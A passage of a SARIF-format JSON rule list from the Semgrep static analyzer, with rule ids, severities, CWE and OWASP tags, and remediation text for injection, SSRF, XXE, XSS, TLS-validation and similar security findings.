code"},"helpUri":"https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","id":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","name":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.iterate-over-empty-map.iterate-over-empty-map"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint","id":"rust.actix.nosql.mongodb-taint.mongodb-taint","name":"rust.actix.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host","id":"php.lang.security.injection.tainted-url-host.tainted-url-host","name":"php.lang.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","id":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","name":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Dangerous client config used, ensure SSL verification"},"help":{"markdown":"Dangerous client config used, ensure SSL verification\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous)\n - [https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html](https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html)\n - [https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous](https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous)\n","text":"Dangerous client config used, ensure SSL verification"},"helpUri":"https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous","id":"rust.lang.security.rustls-dangerous.rustls-dangerous","name":"rust.lang.security.rustls-dangerous.rustls-dangerous","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.rustls-dangerous.rustls-dangerous"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"help":{"markdown":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","id":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","name":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","id":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","name":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"help":{"markdown":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards)\n - [https://developer.apple.com/documentation/uikit/uipasteboard?language=swift](https://developer.apple.com/documentation/uikit/uipasteboard?language=swift)\n - [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)\n","text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"helpUri":"https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","id":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","name":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","id":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","name":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"help":{"markdown":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param)\n - [https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm](https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm)\n","text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"helpUri":"https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","id":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","name":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli)\n - [https://pg.uptrace.dev/](https://pg.uptrace.dev/)\n - [https://pkg.go.dev/github.com/go-pg/pg/v10](https://pkg.go.dev/github.com/go-pg/pg/v10)\n","text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli","id":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","name":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pg-sqli.pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"help":{"markdown":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1)\n","text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1","id":"python.lang.compatibility.python37.python37-compatibility-os1","name":"python.lang.compatibility.python37.python37-compatibility-os1","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-os1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"help":{"markdown":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version)\n - [https://www.landh.tech/blog/20230811-sandwich-attack/](https://www.landh.tech/blog/20230811-sandwich-attack/)\n","text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version","id":"python.lang.security.insecure-uuid-version.insecure-uuid-version","name":"python.lang.security.insecure-uuid-version.insecure-uuid-version","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-uuid-version.insecure-uuid-version"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"help":{"markdown":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system","id":"cpp.lang.security.system-command.dont-call-system.dont-call-system","name":"cpp.lang.security.system-command.dont-call-system.dont-call-system","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.dont-call-system.dont-call-system"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection 